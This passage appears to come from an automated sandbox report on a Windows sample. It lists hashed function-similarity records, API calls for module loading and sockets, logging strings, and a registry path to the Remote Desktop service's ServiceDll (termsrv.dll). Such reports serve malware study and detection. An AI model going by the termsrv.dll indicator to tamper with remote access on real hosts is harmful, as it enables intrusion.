                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 7e03738c070cc10edd4cf49bda78ea93556b05bd29f8f147de0b161cd689fe03
                                    • Instruction ID: 01947791f5d937f0901c5ae055c4dbc1a4d3b178e6aba0c518877456ca4a04e0
                                    • Opcode Fuzzy Hash: 7e03738c070cc10edd4cf49bda78ea93556b05bd29f8f147de0b161cd689fe03
                                    • Instruction Fuzzy Hash: 7DF08BD0E0D68381FA279B76EE002B922156F0ABC4F084131DD0C8B7B8EE6CE946C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
                                    • Instruction ID: b65a72e4d42be08a60d8b93d178e55b1e7d5a968d5671f350f240cfd40e0f72c
                                    • Opcode Fuzzy Hash: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
                                    • Instruction Fuzzy Hash: 88F0ADD0B0D68782FA039B65FC001AD12226F26BC4F0C4672DC5D2B7A9EE2DA9438300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: ceec6de64c1370c87e5f2edf0bd0264aab4e9bbf25e940707cd959db8840fb9e
                                    • Instruction ID: a58ca503682fd869ac0f57a29077949464f8854dfbb37d89460443d5c11d43c3
                                    • Opcode Fuzzy Hash: ceec6de64c1370c87e5f2edf0bd0264aab4e9bbf25e940707cd959db8840fb9e
                                    • Instruction Fuzzy Hash: 95F081D8A1D68791FA134F66EC8A6BD92516F84BC4F0C41B1DCCC6BB99EE2CE546C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 0fdf11ffdb0a7b1b22a57b6d28358aee3fafc17fef1f0b60cc5bd119ee136bb7
                                    • Instruction ID: c10e04da61f7278422055a45915ad5af86552cd758cf4a1dcfecc6beab8f1136
                                    • Opcode Fuzzy Hash: 0fdf11ffdb0a7b1b22a57b6d28358aee3fafc17fef1f0b60cc5bd119ee136bb7
                                    • Instruction Fuzzy Hash: 6CF0D1D1A0C6C381FE174B76EC102B652116F46BD4F084131DE4C9B7B8EEACEE6A8300
                                    APIs
                                    • GetProcAddress.KERNEL32(?,?,00000000,0000027B435613D0,?,00007FF7AABD292B), ref: 00007FF7AABD22A3
                                    • GetLastError.KERNEL32(?,?,00000000,0000027B435613D0,?,00007FF7AABD292B), ref: 00007FF7AABD22D6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 1fc9960f30abe22bcb097999b6fdb8156779ff557b7e3ad85cbb521ca77be5c5
                                    • Instruction ID: d5619b9919b58de7b3c697bbbcf3b81c12724a64ec8cab11b253ccbe4d1d75db
                                    • Opcode Fuzzy Hash: 1fc9960f30abe22bcb097999b6fdb8156779ff557b7e3ad85cbb521ca77be5c5
                                    • Instruction Fuzzy Hash: C6F0F4A0A4F687C6FAA16745F8002B5E3557FA4BC0F864071DC4C0BBB5EE2CE5478320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 188c41bfd6b174dd9fe5aefa1a6f857091f0afd7d23226baab48999a918c53b1
                                    • Instruction ID: 8fbdfa2653560f0c34f18ca53559f3f1521cb784efba7852c3aa344657a45d1b
                                    • Opcode Fuzzy Hash: 188c41bfd6b174dd9fe5aefa1a6f857091f0afd7d23226baab48999a918c53b1
                                    • Instruction Fuzzy Hash: FDF0DCD0A09A8B92FA939B25EC009BD12116F0AFC4F0C41B1CC4C2BBD9EE2CE6478700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: 8d1659e735e9d3400c6de84dd9b40b9c3c6d281b02242d90a8c082e27d936930
                                    • Instruction ID: bde73ccf11faa63e98706bc41a4fc5251d82e0af3dfa47cbf5a7f2feed988cc0
                                    • Opcode Fuzzy Hash: 8d1659e735e9d3400c6de84dd9b40b9c3c6d281b02242d90a8c082e27d936930
                                    • Instruction Fuzzy Hash: 82F030D4F0E68751FD23AB75EC514B426509F16784F442435CD1D96771EE9CAD868301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: 7cca643644e7bcaf1c907baea00bbca0ed8cf20dc5bd066c8b73e79fd5e1c3ca
                                    • Instruction ID: a8250501acf18a6c2f1a936fa7ff104f9d5b11640b164d3754a678fb15390435
                                    • Opcode Fuzzy Hash: 7cca643644e7bcaf1c907baea00bbca0ed8cf20dc5bd066c8b73e79fd5e1c3ca
                                    • Instruction Fuzzy Hash: C9F05EE0E0E69794FA27AB7AED506B122506F0BB84F481431CD0CD7375EE9CAD86C340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: a7ec13649a17c9f296edd1ddf330fe53298f0f0572134f32d410f2f50dfae7a0
                                    • Instruction ID: 6a2b027888ce143d730e1561641c205fc4e3ffe72cd16fe33b8e7722f75e3cf8
                                    • Opcode Fuzzy Hash: a7ec13649a17c9f296edd1ddf330fe53298f0f0572134f32d410f2f50dfae7a0
                                    • Instruction Fuzzy Hash: 92F03AD0B1A68795EE17A776FC504B816515F27B84B4C0AB1C80D3677AFD2CA9868300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteshutdown
                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                    • API String ID: 2143829457-932964775
                                    • Opcode ID: f51b57f847e0f4e1a6bded251f845f031aaaf7d0c87e1379987c8d54826d656a
                                    • Instruction ID: c7cb770f57cd3e888580ca3c8fa4cd85ffcae80b7a92d1bbde13268a635d9e28
                                    • Opcode Fuzzy Hash: f51b57f847e0f4e1a6bded251f845f031aaaf7d0c87e1379987c8d54826d656a
                                    • Instruction Fuzzy Hash: 89F090E8B18483A1E6525F3AECCD2BD1A216F90744F5C42B1D8CCB65A1EE2CA5578700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: 130e48758e1c3a2105a9ce2de6cabd73f869a12da220f205fd1b6cd8289961a9
                                    • Instruction ID: ef8f90c177de6b3420fde7e73d03ae7d2f95761950f643a4ecd37a754d0b61b0
                                    • Opcode Fuzzy Hash: 130e48758e1c3a2105a9ce2de6cabd73f869a12da220f205fd1b6cd8289961a9
                                    • Instruction Fuzzy Hash: 43F0679CA0A68760E9539F3AEC8A9B812006F45BC4F0C05F0C88C27B55ED1CA54A8300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: 32c18b76f08b7cc8001498ea846519ef5bb1b582e68d95df7049c8c15c3c2f96
                                    • Instruction ID: a2d58ca89824ad404ddd73e105cd7e7d58749ce0e5df6abe9e23e686ff6e02dd
                                    • Opcode Fuzzy Hash: 32c18b76f08b7cc8001498ea846519ef5bb1b582e68d95df7049c8c15c3c2f96
                                    • Instruction Fuzzy Hash: 37F067E1A0E6C741FD569B36EC209B426106F16B80F480031CD0CE7770EDDCAE8D8300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: 02aa30a27acabf8418273c4516dbc6be6abafd922b87d9bf7db77230dfddbc77
                                    • Instruction ID: 30654f9683da34ade6e4a98e8ef55b29060cb74ddd6aa0ab2d48096455ce5997
                                    • Opcode Fuzzy Hash: 02aa30a27acabf8418273c4516dbc6be6abafd922b87d9bf7db77230dfddbc77
                                    • Instruction Fuzzy Hash: E9F05ED4E0AACB91FD97A776EC448BC16505F0AB84B4C05B1CC4C36BD5EE1CE5878300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastclosesocketfflushfwrite
                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                    • API String ID: 152032778-2221966578
                                    • Opcode ID: 4d1e840c65dd13ca28f842a676357966ba4de8baa90562c0d7065b947e361975
                                    • Instruction ID: e835a1ffe20576e4e2a57280e4c7319a92cde1e4c9828f0ab57b7b0dbe3c3128
                                    • Opcode Fuzzy Hash: 4d1e840c65dd13ca28f842a676357966ba4de8baa90562c0d7065b947e361975
                                    • Instruction Fuzzy Hash: E5F049DCA0858380FA065F76EC8D2BD1250AFA0B68F1C03B1D8BE761E2AD1CA4568700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Openstrcmpstrlen
                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                    • API String ID: 679246061-1413152910
                                    • Opcode ID: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
                                    • Instruction ID: 228cad9b2a55aab748916bb9e30a1683d87dd9a7dbe1c48d112df1e7879c208a
                                    • Opcode Fuzzy Hash: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
                                    • Instruction Fuzzy Hash: 16214FB1B4C6C740FA229730EC903F963A1AB55344F840132E65DC65A9DFBCDE45C641
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    • Opcode ID: 23f5562685c696737ec1e8831d1221f7ec40636c891bc10526f904917ff911de
                                    • Instruction ID: 778864e6d622ed5c271013d08905deeda65a10e1ad4e1140d8726d1f63828bb1
                                    • Opcode Fuzzy Hash: 23f5562685c696737ec1e8831d1221f7ec40636c891bc10526f904917ff911de
                                    • Instruction Fuzzy Hash: CDF0C2E1F0D58257F7124B39EC011A56660AB95794F108231EC2EC73B4EEBCAD46C702
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    • Opcode ID: fe125208dd0e6dbf3da39a57010b7ff95eace8d8d6e16e185746fb9b93963329
                                    • Instruction ID: b6a6555272d214346d1ab5472ba5bba35ea4908580fd8bfe3a496d4fbec56ca1
                                    • Opcode Fuzzy Hash: fe125208dd0e6dbf3da39a57010b7ff95eace8d8d6e16e185746fb9b93963329
                                    • Instruction Fuzzy Hash: 1BF062E1F0C58286F7125B3AED045B966A0AB9A794F204231ED2DC77B4DEBCEC468701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    • Opcode ID: 67b81b3e321f83b0a377acde5c8563e56ea9b9e6c9116943a0a0c80d8480ee6b
                                    • Instruction ID: 16b38148c20e13f7caab4ba9d1784e3ba67813f0f4d9293846e6a4dda512b5c4
                                    • Opcode Fuzzy Hash: 67b81b3e321f83b0a377acde5c8563e56ea9b9e6c9116943a0a0c80d8480ee6b
                                    • Instruction Fuzzy Hash: 93F0C2E1E1858242F7125B39EC101BD1161EBA6794F1C8372EC2DA37B8ED7CE8468700
